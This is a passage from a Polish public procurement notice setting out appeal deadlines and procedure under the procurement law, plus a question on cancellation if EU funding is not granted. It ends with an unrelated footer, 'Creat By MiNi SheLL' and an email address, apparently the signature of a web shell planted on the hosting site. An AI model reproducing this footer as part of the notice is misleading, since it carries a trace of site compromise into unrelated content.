    kwalifikowanego certyfikatu.
5. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
    wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesienie, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych  w art. 27 ust. 2 ustawy.
6. Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
7. Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
8. Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
9. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia.
10. Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com